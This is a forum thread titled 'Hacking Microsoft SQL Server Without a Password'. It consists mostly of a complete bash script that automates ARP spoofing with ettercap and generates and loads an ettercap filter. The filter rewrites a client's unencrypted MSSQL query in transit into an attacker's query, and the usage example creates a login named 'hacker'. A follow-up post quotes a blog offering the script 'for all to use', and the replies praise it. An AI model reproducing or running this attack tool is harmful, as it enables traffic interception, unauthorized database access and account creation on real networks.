Jump to content
Sign in to follow this  
MartinD

Hacking Microsoft SQL Server Without a Password

Recommended Posts

MartinD

During a recent penetration test, I was performing some packet captures and noticed  some unencrypted Microsoft SQL Server (MSSQL) traffic.  The syntax was unmistakable.  At first I thought this might be a way to capture some authentication credentials.  However, MSSQL encrypts login traffic which meant I would have to crack the encryption to get credentials.  If the installation uses a self-signed certificate, that is fairly easy to crack.

 


#!/bin/bash

#

####################################################################

#

# Written by Rick Osgood

#

# This script is designed to automate the process of hijacking an

# MSSQL database connection. This script can be used to perform a

# MITM attack between two IP addresses using ettercap and ARP

# spoofing. You also submit an original SQL query and a new SQL

# query. The script will create, compile, and load an ettercap

# filter to replace the original SQL string with your new one.

# This should work on any MSSQL conncetion that is not encrypted.

#

####################################################################



args=("$@") #array to store command line arguments



# Set variable defalts

SqlPort=1433 

ServerIP="NULL"

ClientIP="NULL"

FileName="NULL"



# Help function

print_help(){

        echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP] 

-c [SQL Client IP]"

        echo ""

        echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L

OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100"

        echo ""

        echo "This script creates an ettercap filter that will identify a SQL string"

        echo "and replace it with a new string. The script will then compile the filter"

        echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"

        echo "spoofing attack against the specified IP addresses automatically. All you"

        echo "have to do is sit back and wait for the original query to be submitted."

        echo ""

        echo " --help"

        echo "     Show this message."

        echo " -o"

        echo "     Specify the original SQL string to be replaced."

        echo " -i"

        echo "     Specify the new SQL string to be injected. This string must not"

        echo "     longer than the original query string."

        echo " -s"

        echo "     Specify the MSSQL server IP for ARP poison attack. May also use gateway IP"

        echo " -c"

        echo "     Specify the SQL cient IP for ARP poison attack."

        echo " -f"

        echo "     Specify the output filename for the ettercap filter."

        echo " -p"

        echo "     Optional. Specifiy the MSSQL traffic port. Defaults to 1433."

}



# If not enough arguments then quit

if [ $# -lt "4" ]; then

        print_help

        exit 1

fi



COUNTER=0 #Count from zero to number of arguments

while [ $COUNTER -lt $# ]; do

        if [ "${args[$COUNTER]}" == "--help" ]; then

                print_help

                exit 0



        elif [ "${args[$COUNTER]}" == "-o" ]; then

                COUNTER=$(($COUNTER+1))

                OldQuery=${args[$COUNTER]}



        elif [ "${args[$COUNTER]}" == "-i" ]; then

                COUNTER=$((COUNTER+1))

                NewQuery=${args[$COUNTER]}



        elif [ "${args[$COUNTER]}" == "-s" ]; then

                COUNTER=$((COUNTER+1))

                ServerIP=${args[$COUNTER]}



        elif [ "${args[$COUNTER]}" == "-c" ]; then

                COUNTER=$((COUNTER+1))

                ClientIP=${args[$COUNTER]}



        elif [ "${args[$COUNTER]}" == "-f" ]; then

                COUNTER=$((COUNTER+1))

                FileName=${args[$COUNTER]}



        elif [ "${args[$COUNTER]}" == "-p" ]; then

                COUNTER=$((COUNTER+1))

                SqlPort=${args[$COUNTER]}



        else

                echo "Error: Unknown argument \"${args[$COUNTER]}\""

                echo ""

                print_help

                exit 1

        fi



        COUNTER=$(($COUNTER+1))

done;



# Is anything missing?

if [ "$ServerIP" == "NULL" ]; then

        echo "You must specify server IP!"

        exit 1



elif [ "$ClientIP" == "NULL" ]; then

        echo "You must specify client IP!"

        exit 1



elif [ "$FileName" == "NULL" ]; then

        echo "You must specify the file name for the ettercap filter!"

        exit 1

fi



# Calculate length of injected SQL query

length2=`echo $NewQuery | wc -m`

length2=$((length2 - 1))

echo "New string is $length2 bytes"



# Calculate length of original SQL query

length1=`echo $OldQuery | wc -m`

length1=$((length1 - 1))

echo "Original string is $length1 bytes"



# What's the difference?

difference=$((length1 - length2))

echo "Difference is $difference bytes"



# If the new string is too long it won't work

if [ $difference -lt 0 ]; then

        echo ""

        echo "New SQL query is longer than original! Quitting..."

        exit 0

fi



temp=""

for i in `seq 1 $difference`;

do

        temp="$temp "

done

PaddedQuery="$NewQuery$temp"

echo "PaddedQuery is \"$PaddedQuery\""

echo ""



IFS=$'\n' # change separater to newline only. Required or the for loop skips spaces



echo "Converting original query to hex..."

# Convert original query to hex string with NULL padding (How it appears over the wire)

OldQueryHex=""

for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g')

do

        OldQueryHex="$OldQueryHex\x"

        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`

        OldQueryHex="$OldQueryHex$temp"

        OldQueryHex="$OldQueryHex\x00"

done



echo "Converting new query to hex..."

# Convert new query to hex string now.

NewQueryHex=""

for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g')

do

        NewQueryHex="$NewQueryHex\x"

        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`

        NewQueryHex="$NewQueryHex$temp" 

        NewQueryHex="$NewQueryHex\x00"

done



echo "Writing ettercap filter now..."



# Start writing actual ettercap filter file

echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName

echo "       msg(\"SQL traffic discovered\");" >> $FileName

echo "       if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName

echo "              msg(\"Found our string!\");" >> $FileName

echo "              replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName

echo "              msg(\"...and replaced it \");" >> $FileName

echo "       }" >> $FileName

echo "}" >> $FileName



# Exeute etterfilter to create the compiled filter

etterfilter $FileName -o $FileName.ef



# Execute ettercap and load the filter

ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP//



echo ""

echo "Completed Successfully!"

  • Like 2

Share this post


Link to post
MartinD

Something more on this topic :)

https://blog.anitian.com/hacking-sql-servers-without-password/


https://blog.anitian.com/hacking-sql-servers-without-password/

 


Hacking SQL servers is fun. Early this year, I blogged about hacking SQL servers without a password. I used Ettercap to perform a man-in-the-middle attack between a Microsoft SQL server and client. Using Ettercap filters I showed how you can replace a SQL query with your own malicious query in transit. This allows you to execute a diverse set of attacks, such as creating a admin database user to gain access to data or functions. I wrote a shell script to automate the entire process, which this blog published for all to use

 

Share this post


Link to post
cfernandez

awesome!

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  
×